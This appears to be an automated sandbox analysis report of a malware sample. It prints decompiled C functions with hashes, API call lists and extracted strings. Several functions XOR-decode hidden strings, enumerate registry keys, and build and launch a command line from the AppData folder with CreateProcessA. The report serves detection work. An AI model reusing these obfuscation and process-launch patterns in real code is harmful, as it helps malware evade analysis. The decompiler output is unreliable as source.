Opcode Fuzzy Hash: b664b0eb6279fe14015a5ab2bdcc5e76d54d7dff729faeb59dca3a4d8e5e463e
Instruction Fuzzy Hash: E471F831600306AEDB25AB34CC82BBA7BEAEF44712F1441F9FD09D71C1FA74D94986A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B5D2FE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00B5D2FE(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t12 = _a8 + 8; // 0x51ceb70f
					if(GetLocaleInfoW( *_t12, 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E00B56417(_t23, _t23);
									goto L25;
								}
								_t8 = _a8 + 8; // 0x51ceb70f
								if(GetLocaleInfoW( *_t8, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,00B5D624,?,00000000), ref: 00B5D397
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,00B5D624,?,00000000), ref: 00B5D3C0
GetACP.KERNEL32(?,?,00B5D624,?,00000000), ref: 00B5D3D5

Strings

OCP, xrefs: 00B5D352
ACP, xrefs: 00B5D31C

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: ec3dca596d71e90e191e6f1ee1a5ace9afac7b5bbfa869f418f372cd2ddf2066
Instruction ID: 3a226356be2a8446338ef9e969f6a735f25352f14d0801560fe79ae7d851e01d
Opcode Fuzzy Hash: ec3dca596d71e90e191e6f1ee1a5ace9afac7b5bbfa869f418f372cd2ddf2066
Instruction Fuzzy Hash: 6E21D332B04100A6E730AF64D801BAB73E6EF40B62B5686E4ED09D7110FB72DE48C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00B42966, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 177
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B42966(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				char* _t53;
				char _t56;
				void* _t58;
				long _t60;
				intOrPtr _t65;
				short _t66;
				char _t67;
				void _t68;
				void _t72;
				void _t73;
				void* _t76;
				void* _t77;
				long _t79;
				char* _t88;
				int _t91;
				intOrPtr* _t92;
				signed int _t97;
				void* _t102;
				signed int _t104;
				void* _t112;
				void* _t113;
				signed int _t114;
				short* _t118;
				void* _t119;
				void* _t124;
				void* _t133;
				void* _t134;
				char* _t137;
				signed int _t138;
				signed int _t140;
				void* _t141;
				void* _t142;

				_t50 =  *0xb69014; // 0x7e8b4fb6
				 *(_t140 + 0x3c) = _t50 ^ _t140;
				_push(0x208);
				 *((intOrPtr*)(_t140 + 0x18)) =  *((intOrPtr*)(_t140 + 0x44));
				_t53 = E00B509A2();
				asm("movaps xmm0, [0xb3dd20]");
				_t88 = _t53;
				asm("movups [esp+0x28], xmm0");
				asm("movaps xmm0, [0xb3dc60]");
				_t91 = 0;
				asm("movups [esp+0x34], xmm0");
				 *((char*)(_t140 + 0x44)) = 0;
				do {
					_t5 = _t91 + 0x40; // 0x40
					 *(_t140 + _t91 + 0x24) =  *(_t140 + _t91 + 0x24) ^ _t5;
					_t91 = _t91 + 1;
				} while (_t91 < 0x20);
				_t92 = _t140 + 0x24;
				 *((char*)(_t140 + 0x44)) = 0;
				_t112 = _t88 - _t92;
				do {
					_t56 =  *_t92;
					 *((char*)(_t112 + _t92)) = _t56;
					_t92 = _t92 + 1;
				} while (_t56 != 0);
				 *(_t140 + 0x1c) = 0;
				_t58 = GetCurrentProcess();
				__imp__IsWow64Process(_t58, _t140 + 0x18);
				if(_t58 == 0 ||  *((intOrPtr*)(_t140 + 0x18)) == 0) {
					_t60 = RegOpenKeyA(0x80000002, _t88, _t140 + 0xc);
				} else {
					_t60 = RegOpenKeyExA(0x80000002, _t88, 0, 0x109, _t140 + 0xc);
				}
				if(_t60 == 0) {
					_push(0x104);
					_t137 = E00B509A2();
					RegEnumKeyA( *(_t140 + 0x1c), 0, _t137, 0x104);
					_t19 = _t88 - 1; // -1
					_t118 = _t19;
					do {
						_t65 =  *((intOrPtr*)(_t118 + 1));
						_t118 = _t118 + 1;
					} while (_t65 != 0);
					_t66 =  *0xb3d854; // 0x5c
					_t133 = _t137;
					 *_t118 = _t66;
					do {
						_t67 =  *_t137;
						_t137 =  &(_t137[1]);
					} while (_t67 != 0);
					_t138 = _t137 - _t133;
					_t21 = _t88 - 1; // -1
					_t119 = _t21;
					do {
						_t68 =  *(_t119 + 1);
						_t119 = _t119 + 1;
					} while (_t68 != 0);
					 *(_t140 + 0x1c) = 0x2a230c1c;
					_t97 = _t138 >> 2;
					memcpy(_t119, _t133, _t97 << 2);
					_t141 = _t140 + 0xc;
					 *((short*)(_t141 + 0x20)) = 0x2a;
					memcpy(_t133 + _t97 + _t97, _t133, _t138 & 0x00000003);
					_t142 = _t141 + 0xc;
					_t102 = 0;
					do {
						_t26 = _t102 + 0x40; // 0x40
						 *(_t142 + _t102 + 0x18) =  *(_t142 + _t102 + 0x18) ^ _t26;
						_t102 = _t102 + 1;
					} while (_t102 < 5);
					_t113 = _t142 + 0x18;
					 *((char*)(_t142 + 0x1d)) = 0;
					_t134 = _t113;
					do {
						_t72 =  *_t113;
						_t113 = _t113 + 1;
					} while (_t72 != 0);
					_t114 = _t113 - _t134;
					_t33 = _t88 - 1; // -1
					_t124 = _t33;
					do {
						_t73 =  *(_t124 + 1);
						_t124 = _t124 + 1;
					} while (_t73 != 0);
					_t104 = _t114 >> 2;
					memcpy(_t124, _t134, _t104 << 2);
					_t76 = memcpy(_t134 + _t104 + _t104, _t134, _t114 & 0x00000003);
					_t140 = _t142 + 0x18;
					 *(_t140 + 0x1c) = 0;
					_t77 = GetCurrentProcess();
					__imp__IsWow64Process(_t77, _t76);
					if(_t77 == 0 ||  *((intOrPtr*)(_t140 + 0x18)) == 0) {
						_t79 = RegOpenKeyA(0x80000002, _t88, _t140 + 0x10);
					} else {
						_t79 = RegOpenKeyExA(0x80000002, _t88, 0, 0x101, _t140 + 0x10);
					}
					if(_t79 != 0) {
						goto L27;
					} else {
						_push(0);
						 *((intOrPtr*)(_t140 + 0x20)) = 0x2b362010;
						 *((intOrPtr*)(_t140 + 0x24)) = 0x3f032a10;
						 *((short*)(_t140 + 0x28)) = 0x2d;
						E00B42CCF(_t140 + 0x20,  *(_t140 + 0x1c), E00B42D10(_t140 + 0x20),  *((intOrPtr*)(_t140 + 0x18)));
						RegCloseKey( *(_t140 + 0xc));
						RegCloseKey( *(_t140 + 0x10));
						E00B50985(_t88);
					}
				}
				return E00B4AE43( *(_t140 + 0x48) ^ _t140);
			}

APIs

GetCurrentProcess.KERNEL32(?), ref: 00B429DC
IsWow64Process.KERNEL32(00000000), ref: 00B429E3
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00000109,00000000), ref: 00B42A04
RegOpenKeyA.ADVAPI32(80000002,00000000,00000000), ref: 00B42A17
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 00B42A3B
GetCurrentProcess.KERNEL32(?), ref: 00B42AD1
IsWow64Process.KERNEL32(00000000), ref: 00B42AD8
RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00000101,?), ref: 00B42AF9
RegOpenKeyA.ADVAPI32(80000002,00000000,?), ref: 00B42B0C
RegCloseKey.ADVAPI32(00000000,2A230C1C,00000000,?), ref: 00B42B4F
RegCloseKey.ADVAPI32(?), ref: 00B42B55

Strings

-, xrefs: 00B42B2F
*, xrefs: 00B42A7D

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess$CloseCurrentWow64$Enum
String ID: *$-
API String ID: 1684924610-2125244407
Opcode ID: e797b501d35bef3de73964bbdf1746b8faa27b2a6297b66cf6a6460b83bfe7d3
Instruction ID: 508dfdbee0269bc3440d39a4231d607275d59c7a55bb8b1605e9393ac0a5355d
Opcode Fuzzy Hash: e797b501d35bef3de73964bbdf1746b8faa27b2a6297b66cf6a6460b83bfe7d3
Instruction Fuzzy Hash: 635134704083459FDB15CF29DC44A6BBBE8FF99344F40059DF8C193252EB319A49EB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B56AD0, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00B56AD0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, char* _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v17;
				signed int _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				signed int* _v48;
				signed int _t45;
				intOrPtr* _t52;
				signed int* _t53;
				signed int* _t55;
				void* _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t72;
				signed int* _t75;
				intOrPtr _t78;
				char _t82;
				void* _t84;
				void* _t87;
				signed int _t92;
				intOrPtr* _t94;
				signed int _t102;
				intOrPtr* _t107;
				void* _t111;
				intOrPtr* _t112;
				void* _t125;
				intOrPtr* _t126;
				void* _t127;
				intOrPtr* _t129;
				signed int _t130;
				void* _t132;
				char* _t134;
				intOrPtr* _t135;
				signed int _t136;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;

				L0:
				while(1) {
					L0:
					_t45 =  *0xb69014; // 0x7e8b4fb6
					_v8 = _t45 ^ _t136;
					_t134 = _a8;
					_v32 = _t134;
					_v36 = _a16;
					_t129 = _a12;
					_v44 = _t129;
					if(_t134 == 0) {
						break;
					}
					L2:
					if( *_t134 == 0 || _t129 == 0) {
						break;
					} else {
						L4:
						_t52 =  *_t129;
						if(_t52 == 0) {
							break;
						} else {
							L5:
							_t53 = E00B55BBD();
							_v48 = _t53;
							if( *_t52 != 0) {
								L7:
								_push(_v36);
								_t92 =  *_t53;
								 *_t53 =  *_t53 & 0x00000000;
								_push(_t129);
								_v24 = _t92;
								_t130 = E00B56AC5(_a4, _t134);
								_t140 = _t139 + 0x10;
								if(_t130 != 0xffffffff) {
									L50:
									_t55 = _v48;
									if( *_t55 == 0 && _t92 != 0) {
										 *_t55 = _t92;
									}
									goto L54;
								} else {
									L8:
									if( *(E00B55BBD()) != 2 || E00B4CCD0(_t134, 0x5c) != 0 || E00B4CCD0(_t134, 0x2f) != 0 ||  *((char*)(_t134 + 1)) == 0x3a) {
										L12:
										_t130 = _t130 | 0xffffffff;
										goto L50;
									} else {
										L13:
										_v16 = 0x48544150;
										_t14 =  &_v16; // 0x48544150
										_v12 = 0;
										_v28 = 0;
										_t62 = E00B5185E( &_v28, 0, _t14);
										_t102 = _v28;
										_t141 = _t140 + 0xc;
										if(_t62 == 0) {
											L16:
											if(_t102 != 0) {
												L18:
												_t135 = E00B598AF(0x104, 1);
												if(_t135 == 0) {
													L47:
													_t130 = _t130 | 0xffffffff;
													goto L48;
												} else {
													L19:
													_push(0x103);
													_push(_t135);
													_t66 = E00B61446(_v28);
													_t142 = _t141 + 0xc;
													_v40 = _t66;
													if(_t66 != 0) {
														L20:
														_t94 = _v32;
														L21:
														while( *_t135 != 0) {
															_t107 = _t135;
															_t22 = _t107 + 1; // 0x1
															_t125 = _t22;
															do {
																L23:
																_t67 =  *_t107;
																_t107 = _t107 + 1;
															} while (_t67 != 0);
															_t23 = _t135 - 1; // -1
															_t132 = _t23 + _t107 - _t125;
															if(_t132 == E00B65190(_t135, 0x5c) || _t132 == E00B65190(_t135, 0x2f)) {
																L27:
																_t126 = _t135;
																_t26 = _t126 + 1; // 0x1
																_t111 = _t26;
																do {
																	L28:
																	_t69 =  *_t126;
																	_t126 = _t126 + 1;
																} while (_t69 != 0);
																_t127 = _t126 - _t111;
																_t112 = _t94;
																_t130 = _t112 + 1;
																do {
																	L30:
																	_t70 =  *_t112;
																	_t112 = _t112 + 1;
																} while (_t70 != 0);
																if(_t112 - _t130 + _t127 >= 0x104) {
																	break;
																} else {
																	L32:
																	_t72 = E00B60E2C(_t135, 0x104, _t94);
																	_t141 = _t142 + 0xc;
																	if(_t72 != 0) {
																		goto L57;
																	} else {
																		L33:
																		_t75 = E00B55BBD();
																		_push(_v36);
																		_push(_v44);
																		 *_t75 =  *_t75 & 0x00000000;
																		_t130 = E00B56AC5(_a4, _t135);
																		_t143 = _t141 + 0x10;
																		if(_t130 != 0xffffffff) {
																			L56:
																			_t92 = _v24;
																			L48:
																			E00B564B8(_t135);
																			_t102 = _v28;
																			goto L49;
																		} else {
																			L34:
																			if( *(E00B55BBD()) == 2 ||  *((intOrPtr*)(E00B55BAA())) == 0x15) {
																				L45:
																				_push(0x103);
																				_push(_t135);
																				_t78 = E00B61446(_v40);
																				_t142 = _t143 + 0xc;
																				_v40 = _t78;
																				if(_t78 != 0) {
																					continue;
																				} else {
																					break;
																				}
																			} else {
																				L36:
																				_t32 = _t135 + 1; // 0x1
																				_t130 = _t32;
																				if(E00B4CCD0(_t135, 0x2f) != _t135) {
																					L38:
																					_v17 = 0;
																				} else {
																					L37:
																					_t84 = E00B4CCD0(_t130, 0x2f);
																					_v17 = 1;
																					if(_t84 != _t130) {
																						goto L38;
																					}
																				}
																				L39:
																				if(E00B4CCD0(_t135, 0x5c) != _t135 || E00B4CCD0(_t130, 0x5c) != _t130) {
																					_t82 = 0;
																				} else {
																					_t82 = 1;
																				}
																				if(_v17 != 0 || _t82 != 0) {
																					goto L45;
																				} else {
																					break;
																				}
																			}
																		}
																	}
																}
															} else {
																L26:
																_v32 = 0x5c;
																_t87 = E00B60E2C(_t135, 0x104,  &_v32);
																_t141 = _t142 + 0xc;
																if(_t87 != 0) {
																	goto L57;
																} else {
																	goto L27;
																}
															}
															goto L55;
														}
														L46:
														_t92 = _v24;
													}
													goto L47;
												}
											} else {
												goto L17;
											}
										} else {
											L14:
											if(_t62 == 0x16) {
												L57:
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												_push(0);
												E00B52919();
												asm("int3");
												L58:
												_push(_t136);
												continue;
											} else {
												L15:
												L17:
												_t130 = _t130 | 0xffffffff;
												L49:
												E00B564B8(_t102);
												_v28 = _v28 & 0x00000000;
												goto L50;
											}
										}
									}
								}
							} else {
								L6:
								 *_t53 = 0x16;
								E00B528EC();
								L54:
							}
						}
					}
					L55:
					return E00B4AE43(_v8 ^ _t136);
					L59:
				}
				L1:
				 *(E00B55BBD()) = 0x16;
				E00B528EC();
				goto L55;
			}

APIs

_free.LIBCMT ref: 00B56D55

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B56D5F

Strings

PATH, xrefs: 00B56BA3, 00B56BA9
\, xrefs: 00B56C4A

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: PATH$\
API String ID: 776569668-1896636505
Opcode ID: a56bfceca3ffd3f573c902da1bd158bda09aab34e745a7eb455860eaa996c5e0
Instruction ID: 8ec19e3b9b9ac156834a5a7636d16adb8267a0018a23ed51947e9fd806e3613e
Opcode Fuzzy Hash: a56bfceca3ffd3f573c902da1bd158bda09aab34e745a7eb455860eaa996c5e0
Instruction Fuzzy Hash: F4813931A002055EEF35AF68DC42BBE7BF5DF02322F5405E9ED50AB2C2EB758D498661

Uniqueness

Uniqueness Score: -1.00%

Function 00B5C14B, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5C14B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xb690c0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00B564B8(_t46);
							E00B5B26F( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00B564B8(_t47);
							E00B5B726( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00B564B8( *((intOrPtr*)(_t74 + 0x7c)));
						E00B564B8( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00B564B8( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00B564B8( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00B564B8( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00B564B8( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00B5C2BE( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xb693d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00B564B8(_t31);
							E00B564B8( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00B564B8(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00B564B8(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 00B5C18F

Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B28C
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B29E
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2B0
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2C2
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2D4
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2E6
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B2F8
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B30A
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B31C
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B32E
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B340
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B352
Part of subcall function 00B5B26F: _free.LIBCMT ref: 00B5B364

_free.LIBCMT ref: 00B5C184

Part of subcall function 00B564B8: HeapFree.KERNEL32(00000000,00000000,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,00000002,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B5C1A6
_free.LIBCMT ref: 00B5C1BB
_free.LIBCMT ref: 00B5C1C6
_free.LIBCMT ref: 00B5C1E8
_free.LIBCMT ref: 00B5C1FB
_free.LIBCMT ref: 00B5C209
_free.LIBCMT ref: 00B5C214
_free.LIBCMT ref: 00B5C24C
_free.LIBCMT ref: 00B5C253
_free.LIBCMT ref: 00B5C270
_free.LIBCMT ref: 00B5C288

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 98f1c9576a448aad6d578af45898e19f0d7ebca3b939e165d91dceb6bba1d3c2
Instruction ID: 1c45d8150240bda2b6ba814763cf451210cf93eeca270e3b0db7e43555373949
Opcode Fuzzy Hash: 98f1c9576a448aad6d578af45898e19f0d7ebca3b939e165d91dceb6bba1d3c2
Instruction Fuzzy Hash: ED316F32500B049FEF20AA79D845B5A7BEAEF01352F5084D9FD58D7262DF79AC488B20

Uniqueness

Uniqueness Score: -1.00%

Function 00B44CEE, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 188
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00B44CEE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				CHAR* _t54;
				intOrPtr _t60;
				void* _t64;
				void _t65;
				void _t66;
				CHAR* _t72;
				char _t75;
				CHAR* _t91;
				signed char _t93;
				void* _t99;
				signed int _t104;
				void* _t110;
				intOrPtr* _t111;
				void* _t114;
				signed int _t115;
				void* _t117;
				void* _t120;
				intOrPtr _t126;
				intOrPtr* _t130;
				void* _t131;
				CHAR* _t132;
				CHAR* _t133;
				void* _t135;
				CHAR* _t136;
				signed int _t138;
				void* _t140;
				void* _t142;

				_t142 = __eflags;
				_t50 =  *0xb69014; // 0x7e8b4fb6
				 *(_t138 + 0xec) = _t50 ^ _t138;
				 *((intOrPtr*)(_t138 + 0x20)) = E00B509A2();
				E00B42B76(__ebx, 0x104, __esi, _t142, _t52);
				_t54 = E00B509A2();
				_t130 = __imp__SHGetFolderPathA;
				_t91 = _t54;
				 *(_t138 + 0x1c) = _t91;
				 *_t130(0, 0x1a, 0, 0, _t91, 0x208, 0x104, __edi, __esi, _t135, __ebx);
				asm("movaps xmm0, [0xb3db70]");
				_t99 = 0;
				asm("movups [esp+0x78], xmm0");
				 *((intOrPtr*)(_t138 + 0x88)) = 0x2137211f;
				 *((intOrPtr*)(_t138 + 0x8c)) = 0x23057535;
				 *((short*)(_t138 + 0x90)) = 0x3b39;
				 *((intOrPtr*)(_t138 + 0x92)) = 0x3e36;
				do {
					_t8 = _t99 + 0x40; // 0x40
					 *(_t138 + _t99 + 0x78) =  *(_t138 + _t99 + 0x78) ^ _t8;
					_t99 = _t99 + 1;
				} while (_t99 < 0x1d);
				 *((char*)(_t138 + 0x95)) = 0;
				lstrcatA(_t91, _t138 + 0x78);
				_t60 = E00B509A2();
				 *((intOrPtr*)(_t138 + 0x18)) = _t60;
				_t136 = E00B509A2();
				 *_t130(0, 0x1a, 0, 0, _t136, 0x104, 0x40);
				asm("movaps xmm0, [0xb3db70]");
				asm("movups [esp+0x78], xmm0");
				 *((char*)(_t138 + 0x88)) = 0;
				_t64 = E00B42846(_t138 + 0x78);
				_t114 = _t64;
				_t131 = _t64;
				do {
					_t65 =  *_t114;
					_t114 = _t114 + 1;
				} while (_t65 != 0);
				_t115 = _t114 - _t131;
				_t18 = _t136 - 1; // -1
				_t120 = _t18;
				do {
					_t66 =  *(_t120 + 1);
					_t120 = _t120 + 1;
				} while (_t66 != 0);
				_t104 = _t115 >> 2;
				memcpy(_t120, _t131, _t104 << 2);
				memcpy(_t131 + _t104 + _t104, _t131, _t115 & 0x00000003);
				_t140 = _t138 + 0x18;
				_t132 =  *(_t140 + 0x14);
				E00B4A313(lstrcatA, _t132, _t132);
				lstrcatA(_t136, _t132);
				E00B48B24( *((intOrPtr*)(_t140 + 0x1c)), _t136);
				_push(0x514);
				_t72 = E00B509A2();
				asm("movaps xmm0, [0xb3dcf0]");
				_t133 = _t72;
				asm("movups [esp+0x9c], xmm0");
				asm("movaps xmm0, [0xb3dd40]");
				_t110 = 0;
				asm("movups [esp+0xa8], xmm0");
				 *((intOrPtr*)(_t140 + 0xe8)) = 0xbef3e5f1;
				asm("movaps xmm0, [0xb3db30]");
				asm("movups [esp+0xb8], xmm0");
				 *((intOrPtr*)(_t140 + 0xec)) = 0xaae4fcf0;
				asm("movaps xmm0, [0xb3db50]");
				asm("movups [esp+0xc8], xmm0");
				 *((char*)(_t140 + 0xf0)) = 0;
				asm("movaps xmm0, [0xb3df60]");
				asm("movups [esp+0xd8], xmm0");
				do {
					_t26 = _t110 + 0x40; // 0x40
					 *(_t140 + _t110 + 0x98) =  *(_t140 + _t110 + 0x98) ^ _t26;
					_t110 = _t110 + 1;
				} while (_t110 < 0x58);
				_t111 = _t140 + 0x98;
				 *((char*)(_t140 + 0xf0)) = 0;
				_t117 = _t133 - _t111;
				do {
					_t75 =  *_t111;
					 *((char*)(_t117 + _t111)) = _t75;
					_t111 = _t111 + 1;
				} while (_t75 != 0);
				_t93 = 0x62;
				 *((char*)(_t140 + 0x15)) = 0;
				 *((char*)(_t140 + 0x15)) = 0;
				 *(_t140 + 0x14) = _t93 ^ 0x00000040;
				lstrcatA(_t133, _t140 + 0x14);
				lstrcatA(_t133, _t136);
				 *((char*)(_t140 + 0x15)) = 0;
				 *(_t140 + 0x14) = _t93 ^ 0x00000040;
				 *((char*)(_t140 + 0x1d)) = 0;
				lstrcatA(_t133, _t140 + 0x14);
				_t126 = 0x44;
				E00B4D0F0(_t126, _t140 + 0x34, 0, lstrcatA);
				 *((intOrPtr*)(_t140 + 0x3c)) = _t126;
				 *((intOrPtr*)(_t140 + 0x44)) = 0xb699c0;
				asm("stosd");
				_t141 = _t140 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA( *(_t140 + 0x4c), _t133, 0, 0, 0, 0, 0, 0, _t141 + 0x34, _t141 + 0x20);
				return E00B4AE43( *(_t141 + 0xfc) ^ _t141);
			}

APIs

Part of subcall function 00B42B76: GetCurrentProcess.KERNEL32(00000000), ref: 00B42BE0
Part of subcall function 00B42B76: IsWow64Process.KERNEL32(00000000), ref: 00B42BE7
Part of subcall function 00B42B76: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000101,?), ref: 00B42C08

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00B44D3B
lstrcatA.KERNEL32(00000000,?), ref: 00B44D97
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00B44DB6
